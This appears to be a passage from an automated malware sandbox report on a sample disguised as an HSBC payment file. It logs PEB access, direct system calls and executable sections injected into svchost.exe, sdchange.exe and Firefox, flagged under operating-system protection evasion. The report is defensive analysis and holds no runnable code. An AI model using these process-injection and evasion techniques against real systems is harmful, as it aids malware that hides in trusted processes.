            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]2_2_03A04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]2_2_03928B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]2_2_039649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]2_2_039FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]2_2_039C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]2_2_039BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]2_2_039BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]2_2_039B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]2_2_039C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]2_2_039B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]2_2_03A04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]2_2_039BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]2_2_039BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]2_2_03930887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]2_2_0395E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]2_2_03A008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]2_2_039FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]2_2_039BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov ecx, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_007780A9
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0074A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0074A155
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0074A124 SetUnhandledExceptionFilter,0_2_0074A124

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeThread register set: target process: 5924Jump to behavior
